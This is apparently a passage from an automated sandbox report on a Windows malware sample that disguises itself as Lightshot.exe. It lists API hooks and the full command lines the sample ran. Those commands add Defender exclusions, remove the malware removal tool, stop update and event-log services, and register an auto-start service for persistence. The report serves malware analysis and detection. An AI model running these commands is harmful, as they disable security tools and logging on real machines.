                                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                        Process: explorer.exe, Module: ntdll.dll
                                                                        Function NameHook TypeNew Data
                                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:04:35:53
                                                                        Start date:10/01/2025
                                                                        Path:C:\Users\user\Desktop\nW2oopMIdg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\nW2oopMIdg.exe"
                                                                        Imagebase:0x7ff7eb900000
                                                                        File size:2'876'416 bytes
                                                                        MD5 hash:990A3F3B1273510F210FB9B541DA219F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:1
                                                                        Start time:04:35:53
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:04:35:53
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff747680000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\wusa.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff7bb240000
                                                                        File size:345'088 bytes
                                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:12
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:14
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:15
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:16
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:17
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:18
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:19
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:20
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:21
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:22
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:23
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:24
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:25
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\dialer.exe
                                                                        Imagebase:0x7ff7dc670000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:26
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:27
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe delete "GeekBrains"
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:28
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:29
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:30
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:31
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\winlogon.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:winlogon.exe
                                                                        Imagebase:0x7ff6156c0000
                                                                        File size:906'240 bytes
                                                                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:32
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:33
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe start "GeekBrains"
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:34
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:35
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:36
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\ProgramData\Screenshots\Lightshot.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\ProgramData\Screenshots\Lightshot.exe
                                                                        Imagebase:0x7ff7b1c80000
                                                                        File size:2'876'416 bytes
                                                                        MD5 hash:990A3F3B1273510F210FB9B541DA219F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 66%, ReversingLabs
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:37
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:38
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:39
                                                                        Start time:04:35:59
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\lsass.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\lsass.exe
                                                                        Imagebase:0x7ff654c90000
                                                                        File size:59'456 bytes
                                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:40
                                                                        Start time:04:35:59
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:41
                                                                        Start time:04:35:59
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\dwm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"dwm.exe"
                                                                        Imagebase:0x7ff79d4a0000
                                                                        File size:94'720 bytes
                                                                        MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:42
                                                                        Start time:04:36:00
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff747680000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:43
                                                                        Start time:04:36:00
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:44
                                                                        Start time:04:36:00
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:45
                                                                        Start time:04:36:00
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:46
                                                                        Start time:04:36:00
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\wusa.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff7bb240000
                                                                        File size:345'088 bytes
                                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:47
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:48
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:49
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:50
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:51
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:52
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
